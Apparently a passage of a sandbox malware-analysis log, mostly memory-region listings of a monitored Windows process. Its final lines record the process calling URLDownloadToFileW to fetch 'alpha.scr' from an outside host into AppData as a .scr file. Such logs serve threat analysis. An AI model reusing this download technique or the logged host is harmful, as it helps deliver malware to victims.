0x550000 end_va = 0x60dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1139 start_va = 0x660000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 1140 start_va = 0x744c0000 end_va = 0x74551fff monitored = 0 entry_point = 0x74500380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1141 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 1142 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1143 start_va = 0x77580000 end_va = 0x776c6fff monitored = 0 entry_point = 0x77591cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1144 start_va = 0x76f10000 end_va = 0x7705efff monitored = 0 entry_point = 0x76fc6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1145 start_va = 0x490000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 1146 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1147 start_va = 0x760000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 1148 start_va = 0x762c0000 end_va = 0x7633afff monitored = 0 entry_point = 0x762de970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1149 start_va = 0x74ad0000 end_va = 0x74b8dfff monitored = 0 entry_point = 0x74b05630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1150 start_va = 0x76ec0000 end_va = 0x76f03fff monitored = 0 entry_point = 0x76ed9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1151 start_va = 0x76dc0000 end_va = 0x76e6cfff monitored = 0 entry_point = 0x76dd4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1152 start_va = 0x74570000 end_va = 0x7458dfff monitored = 0 entry_point = 0x7457b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1153 start_va = 0x74560000 end_va = 0x74569fff monitored = 0 entry_point = 0x74562a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1154 start_va = 0x745b0000 end_va = 0x74607fff monitored = 0 entry_point = 0x745f25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1155 start_va = 0x76340000 end_va = 0x7642afff monitored = 0 entry_point = 0x7637d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1156 start_va = 0x77370000 end_va = 0x7752cfff monitored = 0 entry_point = 0x77452a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1157 start_va = 0x74bf0000 end_va = 0x75feefff monitored = 0 entry_point = 0x74dab990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1158 start_va = 0x76d70000 end_va = 0x76da6fff monitored = 0 entry_point = 0x76d73b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1159 start_va = 0x76430000 end_va = 0x76928fff monitored = 0 entry_point = 0x76637610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1160 start_va = 0x77320000 end_va = 0x77364fff monitored = 0 entry_point = 0x7733de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1161 start_va = 0x74ac0000 end_va = 0x74acbfff monitored = 0 entry_point = 0x74ac3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1162 start_va = 0x76230000 end_va = 0x762bcfff monitored = 0 entry_point = 0x76279b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1163 start_va = 0x76e70000 end_va = 0x76eb3fff monitored = 0 entry_point = 0x76e77410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1164 start_va = 0x769c0000 end_va = 0x769cefff monitored = 0 entry_point = 0x769c2e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1165 start_va = 0x70010000 end_va = 0x700a1fff monitored = 0 entry_point = 0x7001dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 1166 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1167 start_va = 0x860000 end_va = 0x9e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 1168 start_va = 0x76930000 end_va = 0x7695afff monitored = 0 entry_point = 0x76935680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1169 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1170 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1171 start_va = 0x9f0000 end_va = 0xb70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 1172 start_va = 0xb80000 end_va = 0x1f7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b80000" filename = "" Region: id = 1173 start_va = 0x1f80000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 1174 start_va = 0x1f80000 end_va = 0x2010fff monitored = 0 entry_point = 0x1fb8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1175 start_va = 0x2130000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 1176 start_va = 0x1f80000 end_va = 0x208ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 1177 start_va = 0x4d0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 1178 start_va = 0x2140000 end_va = 0x253ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 1179 start_va = 0x6fc80000 end_va = 0x70008fff monitored = 0 entry_point = 0x6fd1cc60 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 1180 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1181 start_va = 0x71990000 end_va = 0x719aafff monitored = 0 entry_point = 0x71999050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1182 start_va = 0x73180000 end_va = 0x7338efff monitored = 0 entry_point = 0x7322b0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 1183 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1184 start_va = 0x4d0000 end_va = 0x4d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 1185 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1186 start_va = 0x3de20000 end_va = 0x3de2dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "eeintl.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll") Region: id = 1187 start_va = 0x74440000 end_va = 0x744b4fff monitored = 0 entry_point = 0x74479a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1188 start_va = 0x2540000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 1189 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1190 start_va = 0x77110000 end_va = 0x77193fff monitored = 0 entry_point = 0x77136220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1191 start_va = 0x610000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 1192 start_va = 0x1f80000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 1193 start_va = 0x2080000 end_va = 0x208ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 1194 start_va = 0x2090000 end_va = 0x20cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002090000" filename = "" Region: id = 1195 start_va = 0x20d0000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 1196 start_va = 0x2540000 end_va = 0x263ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 1197 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 1198 start_va = 0x26e0000 end_va = 0x27dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 1199 start_va = 0x76c50000 end_va = 0x76d6efff monitored = 0 entry_point = 0x76c95980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1200 start_va = 0x2640000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002640000" filename = "" Region: id = 1201 start_va = 0x27e0000 end_va = 0x28dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027e0000" filename = "" Region: id = 1202 start_va = 0x28e0000 end_va = 0x295ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028e0000" filename = "" Region: id = 1203 start_va = 0x4e0000 end_va = 0x4e4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 1204 start_va = 0x4f0000 end_va = 0x4fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 1205 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1206 start_va = 0x2960000 end_va = 0x2a1bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002960000" filename = "" Region: id = 1207 start_va = 0x510000 end_va = 0x513fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1208 start_va = 0x74420000 end_va = 0x7443cfff monitored = 0 entry_point = 0x74423b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1209 start_va = 0x2a20000 end_va = 0x2d56fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1210 start_va = 0x520000 end_va = 0x523fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 1211 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1212 start_va = 0x650000 end_va = 0x650fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 1213 start_va = 0x2110000 end_va = 0x2110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002110000" filename = "" Region: id = 1214 start_va = 0x2d60000 end_va = 0x3251fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d60000" filename = "" Region: id = 1215 start_va = 0x3260000 end_va = 0x429ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 1216 start_va = 0x2120000 end_va = 0x2124fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 1217 start_va = 0x76960000 end_va = 0x769b9fff monitored = 0 entry_point = 0x76987e70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\SysWOW64\\coml2.dll" (normalized: "c:\\windows\\syswow64\\coml2.dll") Region: id = 1218 start_va = 0x71bd0000 end_va = 0x71d4dfff monitored = 0 entry_point = 0x71c4c630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1219 start_va = 0x73f30000 end_va = 0x741fafff monitored = 0 entry_point = 0x7416c4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1220 start_va = 0x2680000 end_va = 0x2686fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 1221 start_va = 0x719c0000 end_va = 0x71bccfff monitored = 0 entry_point = 0x71aaacb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1222 start_va = 0x77070000 end_va = 0x77101fff monitored = 0 entry_point = 0x770a8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1223 start_va = 0x2690000 end_va = 0x2690fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 1224 start_va = 0x761d0000 end_va = 0x7622efff monitored = 0 entry_point = 0x761d4af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1225 start_va = 0x71970000 end_va = 0x71981fff monitored = 0 entry_point = 0x71974510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 1226 start_va = 0x71940000 end_va = 0x7196efff monitored = 0 entry_point = 0x7194bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1227 start_va = 0x718a0000 end_va = 0x7193afff monitored = 0 entry_point = 0x718df7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 1228 start_va = 0x42a0000 end_va = 0x42dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042a0000" filename = "" Region: id = 1229 start_va = 0x42e0000 end_va = 0x43dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042e0000" filename = "" Region: id = 1230 start_va = 0x26a0000 end_va = 0x26a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 1231 start_va = 0x71850000 end_va = 0x7189efff monitored = 0 entry_point = 0x7185d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1232 start_va = 0x26b0000 end_va = 0x26b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026b0000" filename = "" Region: id = 1233 start_va = 0x71840000 end_va = 0x71847fff monitored = 0 entry_point = 0x71841fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1234 start_va = 0x76db0000 end_va = 0x76db6fff monitored = 0 entry_point = 0x76db1e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1235 start_va = 0x70e80000 end_va = 0x70f03fff monitored = 0 entry_point = 0x70ea6530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1236 start_va = 0x26c0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026c0000" filename = "" Region: id = 1237 start_va = 0x43e0000 end_va = 0x441ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043e0000" filename = "" Region: id = 1238 start_va = 0x4420000 end_va = 0x451ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004420000" filename = "" Region: id = 1239 start_va = 0x70c10000 end_va = 0x70c56fff monitored = 0 entry_point = 0x70c258d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1240 start_va = 0x70c00000 end_va = 0x70c07fff monitored = 0 entry_point = 0x70c01920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1241 start_va = 0x4520000 end_va = 0x4522fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mswsock.dll.mui") Region: id = 1242 start_va = 0x4530000 end_va = 0x4537fff monitored = 0 entry_point = 0x45319c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 1243 start_va = 0x4540000 end_va = 0x4540fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 1244 start_va = 0x4530000 end_va = 0x4537fff monitored = 0 entry_point = 0x45319c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 1245 start_va = 0x4540000 end_va = 0x4540fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 1246 start_va = 0x4530000 end_va = 0x4537fff monitored = 0 entry_point = 0x45319c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 1247 start_va = 0x4540000 end_va = 0x4540fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 1248 start_va = 0x4530000 end_va = 0x4537fff monitored = 0 entry_point = 0x45319c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 1249 start_va = 0x4540000 end_va = 0x4540fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 1250 start_va = 0x70b90000 end_va = 0x70bf3fff monitored = 0 entry_point = 0x70baafd0 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 1251 start_va = 0x769e0000 end_va = 0x76b57fff monitored = 0 entry_point = 0x76a38a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1252 start_va = 0x769d0000 end_va = 0x769ddfff monitored = 0 entry_point = 0x769d5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1253 start_va = 0x4530000 end_va = 0x4531fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 1254 start_va = 0x70b80000 end_va = 0x70b8ffff monitored = 0 entry_point = 0x70b84600 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll") Region: id = 1255 start_va = 0x70b60000 end_va = 0x70b7ffff monitored = 0 entry_point = 0x70b6d120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 1256 start_va = 0x70b30000 end_va = 0x70b5bfff monitored = 0 entry_point = 0x70b4bb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 1257 start_va = 0x4540000 end_va = 0x4540fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004540000" filename = "" Region: id = 1258 start_va = 0x70b00000 end_va = 0x70b07fff monitored = 0 entry_point = 0x70b01d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 1259 start_va = 0x77530000 end_va = 0x77571fff monitored = 0 entry_point = 0x77546f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 1260 start_va = 0x71650000 end_va = 0x71662fff monitored = 0 entry_point = 0x71659950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1261 start_va = 0x70680000 end_va = 0x706aefff monitored = 0 entry_point = 0x706995e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1262 start_va = 0x4530000 end_va = 0x456ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 1263 start_va = 0x4570000 end_va = 0x466ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004570000" filename = "" Region: id = 1264 start_va = 0x70b10000 end_va = 0x70b29fff monitored = 0 entry_point = 0x70b1fa70 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll") Region: id = 1267 start_va = 0x4670000 end_va = 0x4679fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 1846 start_va = 0x4680000 end_va = 0x4690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 1847 start_va = 0x46a0000 end_va = 0x4734fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 1862 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Thread: id = 57 os_tid = 0xdd0 [0157.874] GetProcAddress (hModule=0x76b60000, lpProcName="ExpandEnvironmentStringsW") returned 0x76b7cd50 [0157.874] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%\\alpha73882.scr", lpDst=0x19ed8c, nSize=0x104 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\alpha73882.scr") returned 0x35 [0157.874] LoadLibraryW (lpLibFileName="UrlMon") returned 0x71bd0000 [0157.908] GetProcAddress (hModule=0x71bd0000, lpProcName="URLDownloadToFileW") returned 0x71c4b240 [0157.908] URLDownloadToFileW (param_1=0x0, param_2="https://dukeenergyltd.top/alpha.scr", param_3="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\alpha73882.scr" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\alpha73882.scr"), param_4=0x0, param_5=0x0) returned 0x0 [0159.416] GetProcAddress (hModule=0x76b60000, lpProcName="GetStartupInfoW") returned 0x76b7a740 [0159.416] GetStartupInfoW (in: 